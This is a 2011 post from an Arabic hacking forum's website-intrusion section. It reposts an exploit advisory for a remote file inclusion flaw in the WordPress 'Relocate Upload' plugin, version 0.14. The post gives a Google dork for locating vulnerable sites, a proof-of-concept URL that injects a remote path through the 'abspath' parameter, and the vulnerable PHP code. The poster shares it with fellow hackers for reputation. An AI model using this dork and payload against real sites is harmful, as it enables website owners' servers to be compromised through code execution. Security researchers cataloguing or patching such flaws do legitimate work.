التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-20-2011, 05:50 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

.......... ثغره في سكربت ورد برسس ريموت فايلن انكلود


السلام عليكم ورحمة الله وبركاته

اليوم وانا جالس الف على مواقع الي مختصه بنشر الثغرات

شوفت ثغرات جديده كلها في الورد برسس

ومنها هذي الثغره

كود PHP:
# Exploit Title: Relocate Upload Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)
 
---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
 
---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{       
// WP setup and function access
        
define('WP_USE_THEMES'false);
        require_once(
urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter 
طيب هذي هي الثغره مع اني ما اعرف كيف استغلها بس ولله العضيم من كثر ما انزل مواضيع عشان تساعودوني قلت لازم اثبت وجودي

بس يارب الثغره تعجبكم

تحياتي لكم


eyvi td s;vfj ,v] fvss vdl,j thdgk hk;g,]

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:06 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0